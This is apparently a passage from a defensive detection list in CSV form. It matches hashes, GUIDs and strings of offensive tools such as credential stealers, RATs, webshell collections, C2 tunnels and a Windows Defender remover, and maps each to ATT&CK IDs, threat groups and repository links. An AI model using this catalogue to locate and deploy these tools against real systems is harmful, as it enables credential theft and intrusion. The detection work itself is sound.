"*d323294bc92b8ab3dc05085a795881b3d75c5b1128911bf7478be1fe39d60482*",".{0,1000}d323294bc92b8ab3dc05085a795881b3d75c5b1128911bf7478be1fe39d60482.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39569"
"*d325c92a9bba538fdbb1c054584ffd0672debaef935dfb27e9d0a6b67649d369*",".{0,1000}d325c92a9bba538fdbb1c054584ffd0672debaef935dfb27e9d0a6b67649d369.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39571"
"*d328400cdc424aa3a54ad23f20979aca1324d1de62e28a69c18819671e597b03*",".{0,1000}d328400cdc424aa3a54ad23f20979aca1324d1de62e28a69c18819671e597b03.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39572"
"*d3290c562ad2740c0ddfd8cee2c2239055cf1491f54127f48a4e64549145c6e5*",".{0,1000}d3290c562ad2740c0ddfd8cee2c2239055cf1491f54127f48a4e64549145c6e5.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","39573"
"*d329cca0959dea29eaba648c72467bc41d7b8560061acf377124c208224d035d*",".{0,1000}d329cca0959dea29eaba648c72467bc41d7b8560061acf377124c208224d035d.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","39574"
"*d32e6555888090a428d9d01ea171521419948e23f7362d15dc9e5fa2f14c3440*",".{0,1000}d32e6555888090a428d9d01ea171521419948e23f7362d15dc9e5fa2f14c3440.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39575"
"*d32e8a5b2059eed68244a2089804df6943f575520b09f27d55de0f7c0a10d5a5*",".{0,1000}d32e8a5b2059eed68244a2089804df6943f575520b09f27d55de0f7c0a10d5a5.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","39576"
"*d3366dc09c1ec4e93c9a40f4de0f96088786b6fb44b3fafb3d648a4b6342b596*",".{0,1000}d3366dc09c1ec4e93c9a40f4de0f96088786b6fb44b3fafb3d648a4b6342b596.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","#filehash","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","39577"
"*d33f6e8b7b07e293f431cb39fb4463d854500921ee23fd661143a5c01785417b*",".{0,1000}d33f6e8b7b07e293f431cb39fb4463d854500921ee23fd661143a5c01785417b.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","39579"
"*d3423d953de70480415b1bb516c2a5c635cf2c78a531cc5e4afce3ab11725e90*",".{0,1000}d3423d953de70480415b1bb516c2a5c635cf2c78a531cc5e4afce3ab11725e90.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","39581"
"*d345588bd7855b93993aa01e5c36cd6f9c1690277704d24a6121fe8d05f93d10*",".{0,1000}d345588bd7855b93993aa01e5c36cd6f9c1690277704d24a6121fe8d05f93d10.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39582"
"*d3468041efe888dda240f4aafc6182365b39dfe0ca7ae9c5c5acc0802a34bc5d*",".{0,1000}d3468041efe888dda240f4aafc6182365b39dfe0ca7ae9c5c5acc0802a34bc5d.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","39583"
"*d350f54074d0eb76f3568b2983c1010cd7190f327a5420034de0ca4ad04c6dbd*",".{0,1000}d350f54074d0eb76f3568b2983c1010cd7190f327a5420034de0ca4ad04c6dbd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39585"
"*D35A55BD-3189-498B-B72F-DC798172E505*",".{0,1000}D35A55BD\-3189\-498B\-B72F\-DC798172E505.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#GUIDproject","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","39586"
"*d366383b6e737fd3af2acc5ebc9f209a2c49209b7b444af3c7fe1d39e1775894*",".{0,1000}d366383b6e737fd3af2acc5ebc9f209a2c49209b7b444af3c7fe1d39e1775894.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","#filehash","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","39588"
"*d36d52f798b5f83599fcfefc4051370bd353cffb8ec822f81a2cb7401ac9a667*",".{0,1000}d36d52f798b5f83599fcfefc4051370bd353cffb8ec822f81a2cb7401ac9a667.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39589"
"*d36e479529f169aeb563134d5ded662aed0e9d5ce15a357d2a2832370e1cce0c*",".{0,1000}d36e479529f169aeb563134d5ded662aed0e9d5ce15a357d2a2832370e1cce0c.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","39590"
"*d37c8c47e154d9b2021eb2c857a2ed617ddfc4aa6e644d2302bca09a18d06946*",".{0,1000}d37c8c47e154d9b2021eb2c857a2ed617ddfc4aa6e644d2302bca09a18d06946.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","39594"
"*d37d33ecf520439042e8ed6d68c35599b6a665564ff1c6fc863ffa0156d0e0dd*",".{0,1000}d37d33ecf520439042e8ed6d68c35599b6a665564ff1c6fc863ffa0156d0e0dd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39595"
"*d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7*",".{0,1000}d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","39597"
"*d3821591de381cb2861c5cf554009e51d7afe51b7c14e89b6f06a666bab949ff*",".{0,1000}d3821591de381cb2861c5cf554009e51d7afe51b7c14e89b6f06a666bab949ff.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","39598"
"*d384ec908583b271588a27748850e4cadf9d8b55a4afdfa54170738da54fc4ef*",".{0,1000}d384ec908583b271588a27748850e4cadf9d8b55a4afdfa54170738da54fc4ef.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","39599"
"*d386714d1924af89b940a7f6a9a436bf07938db1e83e686e9f20bd4275660e2d*",".{0,1000}d386714d1924af89b940a7f6a9a436bf07938db1e83e686e9f20bd4275660e2d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39600"
"*d3876cdd08d5cc314448e50b35e6dd7779925bfeb93f6309b12e1e234f832dde*",".{0,1000}d3876cdd08d5cc314448e50b35e6dd7779925bfeb93f6309b12e1e234f832dde.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39601"
"*d38d1bd6117fce3916ca8b1c8c2c0bf62f8cb9753bdc3ac6e18071cd85631a3e*",".{0,1000}d38d1bd6117fce3916ca8b1c8c2c0bf62f8cb9753bdc3ac6e18071cd85631a3e.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","39603"
"*d38d527d1e62c67ee117a812e6de41f422d7707b40b291ca87e73ac44e2de6fe*",".{0,1000}d38d527d1e62c67ee117a812e6de41f422d7707b40b291ca87e73ac44e2de6fe.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39604"
"*d3924d3bf6f59335a1e5453d80eaaa7404cea2e342105c3e69ddfb943aeb29c6*",".{0,1000}d3924d3bf6f59335a1e5453d80eaaa7404cea2e342105c3e69ddfb943aeb29c6.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","0","#filehash","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","39605"
"*d399157530a7b9d0678ab86e8dd1a24e018f38f68f614d06fa22e4b634e933e3*",".{0,1000}d399157530a7b9d0678ab86e8dd1a24e018f38f68f614d06fa22e4b634e933e3.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","39606"
"*d39a670a35257b1686b0f6d6b27fab1691839e925ba18c5c30c973ea70a31391*",".{0,1000}d39a670a35257b1686b0f6d6b27fab1691839e925ba18c5c30c973ea70a31391.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39607"
"*d39b1767ec968904d778d5a0d78ee49bd96e4b66a333c7198f2712e31ff2f46c*",".{0,1000}d39b1767ec968904d778d5a0d78ee49bd96e4b66a333c7198f2712e31ff2f46c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39608"
"*d39ee3711191ba35873ecaf10a0fec4d1bc80bc31a6718e2954f6f4400075d82*",".{0,1000}d39ee3711191ba35873ecaf10a0fec4d1bc80bc31a6718e2954f6f4400075d82.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","39609"
"*d3a7210d3999176aaea1f64927668d443bffbd764fe113e2869b1ad03c2d3013*",".{0,1000}d3a7210d3999176aaea1f64927668d443bffbd764fe113e2869b1ad03c2d3013.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","39612"
"*d3a8f179535cb7e3e16929e3e65811416d7775673d9abbeeca8d814f5bfa927a*",".{0,1000}d3a8f179535cb7e3e16929e3e65811416d7775673d9abbeeca8d814f5bfa927a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39613"
"*d3c1e10f04b8628fe4f739c7f59ffe38433786d543c9a8cb2fb0b85e1bf0912c*",".{0,1000}d3c1e10f04b8628fe4f739c7f59ffe38433786d543c9a8cb2fb0b85e1bf0912c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39619"
"*d3c3d97fdf1783eb56340521d315a0071b1f700ab3cec537723b866e3f56ebc3*",".{0,1000}d3c3d97fdf1783eb56340521d315a0071b1f700ab3cec537723b866e3f56ebc3.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39620"
"*d3c6d1e4ca184e35b872d8e376f74229db95aa4d40b99def7706263e8612ba09*",".{0,1000}d3c6d1e4ca184e35b872d8e376f74229db95aa4d40b99def7706263e8612ba09.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","39621"
"*d3cf1621c8b439251029d7652b385722e0a7accc8b9877e9fda80ff1aae6d2b5*",".{0,1000}d3cf1621c8b439251029d7652b385722e0a7accc8b9877e9fda80ff1aae6d2b5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39623"
"*d3ckx1/Crack-allDBs*",".{0,1000}d3ckx1\/Crack\-allDBs.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tool","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","N/A","8","1","54","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z","39624"
"*D3CrYP7V41U3(*",".{0,1000}D3CrYP7V41U3\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","39625"
"*d3d1a4bc05989627fc32615a0ec5b280f521577437a7bbce5dbd2e06a9a54602*",".{0,1000}d3d1a4bc05989627fc32615a0ec5b280f521577437a7bbce5dbd2e06a9a54602.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39626"
"*D3DF3F32716042404798E3E9D691ACED2F78BD?D5*",".{0,1000}D3DF3F32716042404798E3E9D691ACED2F78BD\?D5.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","39628"
"*d3e1ab57a570a8853f6ca82ceada334f8e909252cca989451d201ae14cd178a4*",".{0,1000}d3e1ab57a570a8853f6ca82ceada334f8e909252cca989451d201ae14cd178a4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39629"
"*D3E7005E-6C5B-47F3-A0B3-028C81C0C1ED*",".{0,1000}D3E7005E\-6C5B\-47F3\-A0B3\-028C81C0C1ED.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","39631"
"*d3e8378618c05eab2159113af6737a1c6b49f982ebe2eb1ab7e9b52e5ce1b330*",".{0,1000}d3e8378618c05eab2159113af6737a1c6b49f982ebe2eb1ab7e9b52e5ce1b330.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39632"
"*d3eb242554adec76ed43cb76dae2c776bf086b2e2c15335c80fe79852286310e*",".{0,1000}d3eb242554adec76ed43cb76dae2c776bf086b2e2c15335c80fe79852286310e.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","39634"
"*d3fb208381f7b76b1dfd3250b98fd258bdf1a1d77d721dd52b19558968910cb1*",".{0,1000}d3fb208381f7b76b1dfd3250b98fd258bdf1a1d77d721dd52b19558968910cb1.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","39637"
"*d3fc31e347e01560159e4a3955f4ceca4ee12b06a2f56c448ce5d10c9c8788cd*",".{0,1000}d3fc31e347e01560159e4a3955f4ceca4ee12b06a2f56c448ce5d10c9c8788cd.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","39638"
"*d3fcbfcd8d9ca33ba19dffbcc8d5de2f8ef18baa028e41eded243a84d496e8d8*",".{0,1000}d3fcbfcd8d9ca33ba19dffbcc8d5de2f8ef18baa028e41eded243a84d496e8d8.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#filehash","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","39640"
"*d3lb3@protonmail.com*",".{0,1000}d3lb3\@protonmail\.com.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#email","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","39641"
"*D3m0n1z3dShell-main*",".{0,1000}D3m0n1z3dShell\-main.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","39642"
"*d403d6b2805db4649b37c3646cf9cce6eecbdb3350a5eb5e78079c0d8f55f7a8*",".{0,1000}d403d6b2805db4649b37c3646cf9cce6eecbdb3350a5eb5e78079c0d8f55f7a8.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","39645"
